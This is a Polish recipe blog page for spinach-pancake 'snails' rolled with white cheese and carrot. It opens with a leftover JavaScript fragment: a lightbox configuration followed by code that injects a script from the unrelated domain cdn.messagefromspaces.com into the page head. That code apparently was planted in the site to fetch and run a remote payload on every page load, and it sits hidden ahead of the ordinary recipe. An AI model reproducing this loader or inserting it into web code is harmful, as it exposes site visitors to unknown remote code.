, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Naleśnikowe „ślimaki” ze szpinakiem

Wydrukuj artykuł Wydrukuj artykuł

Naleśnikowe "ślimaki" ze szpinakiem

„Ooo.. mima, mima*!” zawołał Igorek gdy zasiadł przy stole. Krótki był żywot ślimaka…

Szpinakowe naleśniki można wykorzystać na różne sposoby, przekładając dowolnym farszem wedle smaku. Nadają się na przykład na śniadanie w wersji ślimakowej, jako koreczki na przyjęcie lub… każdego o każdej porze jako paluchy z mozarellą.

Szpinak:

  • torebka mrożonego rozdrobnionego szpinaku
  • łyżka posiekanego świeżego koperku
  • łyżeczka posiekanej natki pietruszki
  • 3 ząbki czosnku
  • sól i pieprz
  • 1/3 łyżeczki gałki muszkatołowej

Szpinak rozmrozić, w miarę możliwości odlać wodę, włożyć do rondla. Dodać 3 ząbki czosnku przeciśnięte przez praskę. Odparować na wolnym ogniu, potem doprawić koperkiem, natką pietruszki gałką, solą i pieprzem.

Składniki na 8 naleśników:

  • 3 jajka
  • szklanka mleka
  • szczypta soli
  • szklanka mąki (mąkę należy dozować stopniowo do uzyskania średnio gęstego ciasta naleśnikowego)
  • 3 czubate łyżki szpinaku przygotowanego w sposób opisany powyżej.
  • 2 łyżki oleju

Farsz:

  • serek biały jak na sernik
  • starta, ugotowana marchewka

Naleśniki smażyłam na suchej patelni, posmarowałam serkiem i dodałam marchewkę. Zwinęłam w rulon i wstawiłam do lodówki. Dzięki temu dobrze się skleiły i łatwo było kroić plastry i formować ślimaki. Rogi ślimakowe zrobiłam z łodyżek natki pietruszki.

*tłum. z języka Igorowego: „ślimak”

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony